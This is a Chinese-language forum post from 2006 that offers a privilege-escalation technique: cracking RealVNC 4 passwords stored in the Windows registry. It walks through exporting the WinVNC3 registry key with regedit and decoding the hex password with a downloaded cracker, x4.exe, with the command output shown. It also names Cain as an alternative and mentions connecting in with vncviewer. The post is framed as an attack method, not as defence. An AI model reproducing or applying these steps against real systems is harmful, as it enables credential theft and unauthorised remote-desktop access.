服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5026|回复: 1

另种提升系统权限--破解VNC4密码

[复制链接]
dirtysea 发表于 2006-4-3 23:11:43 | 显示全部楼层 |阅读模式

VNC (Virtual Network Computing)

默认安装在:C:\Program Files\RealVNC\VNC4\ 

2 logmessages.dll edit del copy move
2 unins000.dat edit del copy move
2 unins000.exe edit del copy move
2 vncconfig.exe edit del copy move
2 vncviewer.exe edit del copy move
2 winvnc4.exe edit del copy move
2 wm_hooks.dll

有两种方法:
一、取得Registry值后的做法
取得\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password或者\HKEY_CURRENT_USER\Software\Realvnc\WinVNC4
下的字串值(如: 2F 98 1D C5 48 E0 9E C2),
下载一个VNC4密码破解软件x4.exe,在命令模式下执行“x4 -w”,接下来输入一个码后按一次回车……最后密码就解出来了。

D:\WINNT\system32>regedit /e abc.reg HKEY_CURRENT_USER\Software\ORL\WinVNC3

D:\WINNT\system32>type abc.reg
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:78,a7,71,d1,a0,7d,28,f6
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000


D:\WINNT\system32>
哈哈,看到了没???"Password"=hex:78,a7,71,d1,a0,7d,28,f6 就是我梦寐以求的东东。

即然找到了所需要的东西,就让我们开始无聊的破解吧。(以下操作是在我的机器上)
D:\x4>x4 -W
78
a7
71
d1
a0
7d
28
f6
Entered HEX String: 78 a7 71 d1 a0 7d 28 f6
VNC Password: hehe

嗯,密码是 hehe ,一切就是这么简单。要注意大小写的问题。

当我再用 vncviewer.exe 连接过去 
一、直接使用cain来破解

这个就很简单了,不再说明!祝你好运!

超メ音速ツ 发表于 2006-2-23 08:41:00 | 显示全部楼层

re:另种提升系统权限--破解VNC4密码

好样的!!!...........

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-5-3 00:13 , Processed in 0.151634 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表